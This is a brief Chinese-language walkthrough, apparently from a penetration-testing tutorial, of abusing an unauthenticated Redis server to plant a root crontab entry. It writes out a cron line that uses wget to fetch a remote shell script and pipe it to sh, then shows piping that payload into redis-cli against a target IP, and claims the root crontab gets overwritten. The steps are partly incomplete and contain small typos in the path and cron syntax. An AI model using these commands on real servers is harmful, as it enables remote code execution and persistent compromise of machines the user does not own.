Redis服务器在初始情况下,并未配置有crontabs相关的计划任务,可在/var/spool/cron/crontabs目录下查看到无文件。
也可以进入编辑模式,发现并无计划任务,生成的root文件中还未做任何配置。
crontab -e
攻击方任意创建文件,
vi 1.txt
编写命令
***** wget -q -O - http://*/%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_23610.sh | sh > /dev/null 2>&1
接着
(echo -e "\n\n";cat 1.txt;echo -e "\n\n") > foo.txt
cat /root/foo.txt | ./redis-cli -h 192.168.23.128 -x set a
完成之后,可以在Redis服务器中,查看到/var/spool/cron/crontas中的root文件已经被攻击方的计划任务所覆盖。